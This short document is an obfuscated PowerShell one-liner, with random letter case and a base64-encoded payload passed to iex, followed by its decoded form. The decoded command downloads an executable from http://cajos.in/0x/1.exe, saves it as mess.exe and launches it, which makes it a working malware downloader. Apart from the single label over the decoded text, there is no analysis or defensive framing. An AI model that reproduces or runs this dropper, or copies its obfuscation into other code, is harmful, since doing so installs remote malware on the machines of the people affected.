iex([sysTem.TeXt.EnCodinG]::uTF8.geTStriNG([SYstEm.coNVErT]::FROmbasE64StriNG('CihOZXctT2JqZWN0IHNZc1RlbS5ORXQuV2ViQ0xJZU50KS5kT3dubE9BZGZpTGUoJ2h0dHA6Ly9jYWpvcy5pbi8weC8xLmV4ZScsJ21lc3MuZXhlJyk7U3RhcnQtUHJvY2VzcyAnbWVzcy5leGUnCgo=')));exit

##### B64 CONTENT #####


(New-Object sYsTem.NEt.WebCLIeNt).dOwnlOAdfiLe('http://cajos.in/0x/1.exe','mess.exe');Start-Process 'mess.exe'

